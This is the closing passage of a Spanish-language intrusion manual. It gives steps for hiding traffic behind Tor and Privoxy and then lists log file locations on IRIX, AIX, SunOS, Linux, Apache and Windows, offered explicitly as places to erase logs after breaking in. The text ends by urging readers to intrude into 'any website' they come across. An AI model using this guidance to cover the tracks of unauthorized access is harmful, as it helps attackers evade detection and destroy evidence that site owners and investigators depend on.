$ sudo gedit /etc/privoxy/config/

7. En ese editor de texto al final del mismo agregamos la siguiente linea, muy importante agregar el punto (.) al final:

forward-socks4a / localhost:9050 .

Page 30: Infiltraciones - Un Poco de Todo

8. Activamos nuestro TOR y el Privoxy agregando estas lineas siempre en consola o terminal:

$ sudo /etc/init.d/tor start$ sudo /etc/init.d/privoxy start

* Dato importante, es usar Firefox y agregar el addons torbutton desde aca:

https://addons.mozilla.org/firefox/addon/2275

sergio sosa - TOR, privoxy y torbutton en Ubuntu 9.10

Ahora si quieren borrar unos logs aqui estan unos paths donde posiblemente estén.

Lugares donde se Guardan los Logs

IRIX:=================

/var/adm/SYSLOG/var/adm/sulog/var/adm/utmp/var/adm/utmpx/var/adm/wtmp/var/adm/wtmpx/var/adm/lastlog/username/usr/spool/lp/log/var/adm/lp/lpd-errs/usr/lib/cron/log/var/adm/loginlog/var/adm/pacct/var/adm/dtmp/var/adm/acct/sum/loginlog/var/adm/X0msgs/var/adm/crash/vmcore/var/adm/crash/unix

AIX:=================

/var/adm/pacct/var/adm/wtmp/var/adm/dtmp/var/adm/qacct/var/adm/sulog/var/adm/ras/errlog/var/adm/ras/bootlog/var/adm/cron/log/etc/utmp/etc/security/lastlog/etc/security/failedlogin/usr/spool/mqueue/syslog

Page 31: Infiltraciones - Un Poco de Todo

SunOS:=================

/var/adm/messages/var/adm/aculogs/var/adm/aculog/var/adm/sulog/var/adm/vold.log/var/adm/wtmp/var/adm/wtmpx/var/adm/utmp/var/adm/utmpx/var/adm/log/asppp.log/var/log/syslog/var/log/POPlog/var/log/authlog/var/adm/pacct/var/lp/logs/lpsched/var/lp/logs/lpNet/var/lp/logs/requests/var/cron/log/var/saf/_log/var/saf/port/log

Linux:=================

/var/log/lastlog/var/log/telnetd/var/run/utmp/var/log/secure/root/.ksh_history/root/.bash_history/root/.bash_logut/var/log/wtmp/etc/wtmp/var/run/utmp/etc/utmp/var/log/var/adm/var/apache/log /var/apache/logs /usr/local/apache/log/usr/local/apache/logs/var/log/acct/var/log/xferlog/var/log/messages/var/log/proftpd/xferlog.legacy/var/log/proftpd.access_log /var/log/proftpd.xferlog/var/log/httpd/error_log/var/log/httpd/access_log/etc/httpd/logs/access_log/etc/httpd/logs/error_log /var/log/httpsd/ssl.access_log/var/log/httpsd/ssl_log/var/log/httpsd/ssl.access_log/etc/mail/access

Page 32: Infiltraciones - Un Poco de Todo

/var/log/qmail/var/log/smtpd/var/log/samba/var/log/samba-log.%m/var/lock/samba/root/.Xauthority/var/log/poplog/var/log/news.all/var/log/spooler/var/log/news/var/log/news/news/var/log/news/news.all/var/log/news/news.crit/var/log/news/news.err/var/log/news/news.notice/var/log/news/suck.err/var/log/news/suck.notice/var/spool/tmp/var/spool/errors/var/spool/logs/var/spool/locks/usr/local/www/logs/thttpd_log/var/log/thttpd_log/var/log/ncftpd/misclog.txt/var/log/ncftpd.errs/var/log/auth

Red Hat, Mac OS X

/var/log/httpd/access_log /var/log/httpd/error_log

Solaris

/var/apache/logs/access_log /var/apache/logs/error_log

SuSE Linux Enterprise Server

/var/log/httpd/access_log /var/log/httpd/error_log

lampp

/opt/lampp/logs/error_log /opt/lampp/logs/access_log

Debian

/var/log/apache/access.log /var/log/apache/error.log /var/log/apache-ssl/error.log /var/log/apache-ssl/access.log

FreeBSD

/usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log

Page 33: Infiltraciones - Un Poco de Todo

OpenBSD

/var/www/log/access_log /var/www/log/error_log

Windows

C:\Program Files\Apache Group\Apache\logs\error.log C:\Program Files\Apache Group\Apache\logs\access.log c:\apache\logs\error.log c:\apache\logs\access.log

Otras posibles Localizaciones:/etc/httpd/logs/access.log /etc/httpd/logs/error.log /etc/httpd/logs/access_log /etc/httpd/logs/error_log /usr/local/apache/logs/access_log /usr/local/apache/logs/error_log /usr/local/apache/logs/access.log /usr/local/apache/logs/error.log /var/log/apache/access_log /var/log/apache/error_log /var/log/apache/access.log /var/log/apache/error.log /var/log/access_log /var/log/error_log /var/www/logs/error.log /var/www/logs/access.log /var/www/logs/error_log /var/www/logs/access_log

Una Vez Terminado de leer el manual creo que te sentirás en confianza de hacer una intrusión en cualquier web que se te ponga en tu Camino ^^,aunque no revele todos los métodos de intrusión que hay, solo mostré los que mas se usan.

Pero tened cuidado a donde se infiltran.

Con el tiempo Posteare Mas tipos de métodos ya que no son los únicos.